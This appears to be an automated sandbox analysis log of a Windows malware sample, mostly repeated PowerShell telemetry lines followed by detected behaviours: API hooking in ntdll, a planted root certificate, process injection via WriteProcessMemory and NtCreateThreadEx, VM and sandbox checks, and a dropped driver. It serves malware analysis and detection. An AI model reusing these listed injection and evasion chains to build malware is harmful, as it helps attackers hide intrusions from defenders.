        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
        Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Contains functionality to compare user and computer (likely to detect sandboxes)
        Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,25_2_00000001400010C0
        Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,63_2_00000001400010C0
        Query firmware table information (likely to detect VMs)
        Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4599Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5260Jump to behavior
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8489Jump to behavior
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1509Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9949Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5636
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4022
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9876
        Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1808
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeDropped PE file which has not been started: C:\Windows\Temp\zhgmaxoaawxc.sysJump to dropped file
        Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_37-14709
        Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_42-14805
        Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_40-14770
        Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_31-22064
        Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_25-480
        Source: C:\Windows\System32\lsass.exeAPI coverage: 7.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.3 %
        Source: C:\Windows\System32\dialer.exeAPI coverage: 0.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.0 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.2 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.2 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200Thread sleep count: 4599 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep count: 5260 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep time: -12912720851596678s >= -30000sJump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 616Thread sleep count: 8489 > 30Jump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 616Thread sleep time: -8489000s >= -30000sJump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 616Thread sleep count: 1509 > 30Jump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 616Thread sleep time: -1509000s >= -30000sJump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 3616Thread sleep count: 9949 > 30Jump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 3616Thread sleep time: -9949000s >= -30000sJump to behavior
